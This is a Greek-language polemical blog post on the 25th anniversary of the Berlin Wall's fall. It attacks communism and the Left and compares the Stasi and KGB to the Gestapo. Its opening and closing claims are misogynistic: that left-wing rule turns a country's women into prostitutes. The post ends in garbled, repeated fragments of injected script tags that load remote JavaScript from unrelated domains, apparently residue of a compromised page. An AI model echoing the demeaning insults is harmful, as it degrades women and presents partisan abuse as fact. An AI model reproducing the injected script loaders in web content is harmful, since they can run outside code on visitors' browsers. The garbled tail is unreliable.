Οι πόρνες του τείχους του Βερολίνου – Του Μπετόβλακα

Το “καλό” με την πτώση της Αριστεράς, είναι ότι όταν καταρρέει, γεμίζει ο τόπος με φθηνές πόρνες! Το κακό είναι, ότι αν κυβερνούσε την δική σου Πατρίδα, τότε πόρνη, γίνεται η μητέρα σου, η γυναίκα σου και η αδελφή σου!!!
Μπετόβλακας

25 χρόνια πέρασαν από την πτώση του τείχους του Βερολίνου, την αρχή του τέλους δηλαδή, για την τυραννία που βίωσε η μισή Ευρώπη από την Κομμουνιστική κρεατομηχανή. Το τέλος του Δευτέρου Παγκοσμίου Πολέμου, δεν ήταν και το τέλος της δυστυχίας για αυτούς τους λαούς. Η κατοχή των χωρών από τους Ναζιστές, αντικαταστάθηκε απλά από την κατοχή των Κομμουνιστών. Δεν άλλαξε τίποτα απολύτως παρά μόνο οι στολές! Η Γκεστάπο έγινε KGB και ΣΤΑΖΙ, ο Χίτλερ έγινε Στάλιν, το Άουσβιτς έγινε Γκουλάγκ αλλά η δυστυχία για τους λαούς έμεινε ίδια.

Με την πτώση του τείχους, αποκαλύφθηκε σε όλη του την έκταση το μέγεθος του εγκλήματος. Ακόμα και οι πλέον καχύποπτοι, πείστηκαν για τα εγκλήματα που έγιναν. Τα αρχεία τις Στάζι και της KGB έστεκαν αδιάψευστοι μάρτυρες. Οι μισοί πολίτες κατέδιδαν τους άλλους μισούς, για να επιβιώσουν. Οι δάσκαλοι, ψάρευαν πληροφορίες από τους μαθητές τους για τις πολιτικές πεποιθήσεις των γονιών τους και η σύζυγος κατέθετε ότι ο σύζυγός της ήταν εχθρός της επανάστασης. Οι μοναδικοί υποστηρικτές που απέμειναν σε αυτούς που υπόσχονταν τον σοσιαλιστικό παράδεισο, αλλά προσέφεραν την Αριστερή κόλαση, ήταν οι θύτες. Πρώην πράκτορες των μυστικών υπηρεσιών, ρουφιάνοι του συστήματος και μοσχοαναθρεμένα κομματόσκυλα.

Με την πτώση του τείχους, οι πολίτες των χωρών αυτών αντίκρισαν την άλλη πλευρά του τείχους και το επίπεδο ζωής των δυτικών. Το Βερολίνο, είναι το χαρακτηριστικότερο παράδειγμα. Η πόλη χωρίστηκε στην μέση το 1945. Οι ίδιοι κάτοικοι, η ίδια νοοτροπία, το ίδιο μορφωτικό επίπεδο, τα πάντα ίδια. Μετά από 44 χρόνια όμως, οι μεν Δυτικοί είχαν μια ελεύθερη ζωή, και ένα πολύ καλό βιοτικό επίπεδο. Οι Ανατολικογερμανοί από την άλλη πλευρά, ήταν εξαθλιωμένοι, είχαν ποτιστεί από την ρουφιανιά και δεν είχαν στο ήλιο μοίρα. Τι ήταν αυτό που εξαθλίωσε τον λαούς; Γιατί πείνασαν οι Ανατολικογερμανοί και όχι οι Δυτικογερμανοί. Η απάντηση είναι προφανέστατη. Την Ανατολική Γερμανία την κυβέρνησε η Αριστερά της τεμπελιάς και της ρουφιανιάς!!!

Μόνο δύο χώρες σε ολόκληρο τον πλανήτη, δεν μετέτρεψαν τις γυναίκες τους σε πόρνες, όταν έφυγαν από την εξουσία οι Αριστεροί. Η Ανατολική Γερμανία και η Κύπρος. Στην Ανατολική Γερμανία, τον λογαριασμό της σωτηρίας τον πλήρωσαν οι Δυτικογερμανοί. Στην Κύπρο, ο αριστερός Χριστόφιας παρέλαβε την καλύτερη οικονομία της ευρωζώνης και μετά από πέντε χρόνια ακριβώς, παρέδωσε ουρές στα ΑΤΜ και στα super market! Και εκεί τον λογαριασμό τον πλήρωσε ο Κυπριακός λαός και ο ευρωπαίος φορολογούμενος. Βλέπετε, οι Κύπριοι ήθελαν…να δοκιμάσουν την Αριστερά που δεν είχε κυβερνήσει ποτέ!

Το αστείο, της υπόθεσης είναι ότι λίγο μετά την πτώση του τείχους και την πλήρη αποκάλυψη της αλήθειας, ένα νέο παιδί στην Ελλάδα, έγινε μέλος της Κομουνιστικής Νεολαίας Ελλάδος (ΚΝΕ). Αυτό το νέο παιδί πρωτοστάτησε στις πρώτες καταλήψεις σε σχολεία, και σήμερα θέλει να γίνει πρωθυπουργός!!!
Αυτό θα πει προοδευτικός νέος, με όραμα για την χώρα.

Βρείτε το Μπετόβλακα στο facebook___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >